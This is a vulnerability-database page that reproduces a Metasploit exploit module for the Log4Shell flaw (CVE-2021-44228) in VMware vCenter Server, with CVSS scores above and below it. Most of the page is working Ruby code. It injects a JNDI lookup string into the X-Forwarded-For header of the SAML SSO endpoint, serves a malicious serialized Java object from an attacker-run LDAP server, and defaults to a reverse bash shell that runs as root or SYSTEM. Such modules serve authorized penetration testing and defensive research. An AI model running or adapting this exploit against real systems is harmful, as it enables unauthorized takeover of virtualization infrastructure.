CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
99.6%
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows. This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page vector.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Log4Shell
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::CheckModule
prepend Msf::Exploit::Remote::AutoCheck
def initialize(_info = {})
super(
'Name' => 'VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Description' => %q{
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can sent to the server
that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on
Windows.
This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page
vector.
},
'Author' => [
'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff
'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
'jbaines-r7', # vCenter research
'w3bd3vil' # vCenter PoC https://twitter.com/w3bd3vil/status/1469814463414951937
],
'References' => [
[ 'CVE', '2021-44228' ],
[ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0028.html' ],
[ 'URL', 'https://twitter.com/w3bd3vil/status/1469814463414951937' ]
],
'DisclosureDate' => '2021-12-09',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SRVPORT' => 389,
'WfsDelay' => 30,
'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
},
'Targets' => [
[
'Windows', {
'Platform' => 'win'
},
],
[
'Linux', {
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
},
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'AKA' => ['Log4Shell', 'LogJam'],
'Reliability' => [REPEATABLE_SESSION],
'RelatedModules' => [
'auxiliary/scanner/http/log4shell_scanner',
'exploit/multi/http/log4shell_header_injection'
]
}
)
register_options([
OptString.new('TARGETURI', [ true, 'Base path', '/'])
])
end
def check
validate_configuration!
return Exploit::CheckCode::Unknown if tenant.nil?
super
end
def check_options
{
'LDAP_TIMEOUT' => datastore['WfsDelay'],
'HTTP_HEADER' => 'X-Forwarded-For',
'TARGETURI' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',
'HEADERS_FILE' => nil,
'URIS_FILE' => nil
}
end
def build_ldap_search_response_payload
return [] if @search_received
@search_received = true
print_good('Delivering the serialized Java object to execute the payload...')
build_ldap_search_response_payload_inline('BeanFactory')
end
def tenant
return @tenant unless @tenant.nil?
res = send_request_cgi('uri' => normalize_uri(target_uri, 'ui', 'login'))
return nil unless res&.code == 302
return nil unless res.headers['Location'] =~ %r{websso/SAML2/SSO/([^/]+)\?}
@tenant = Regexp.last_match(1)
end
def trigger
@search_received = false
# HTTP request initiator
send_request_cgi(
'uri' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',
'headers' => { 'X-Forwarded-For' => log4j_jndi_string }
)
end
def exploit
validate_configuration!
start_service
trigger
sleep(datastore['WfsDelay'])
handler
ensure
cleanup
end
end
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
99.6%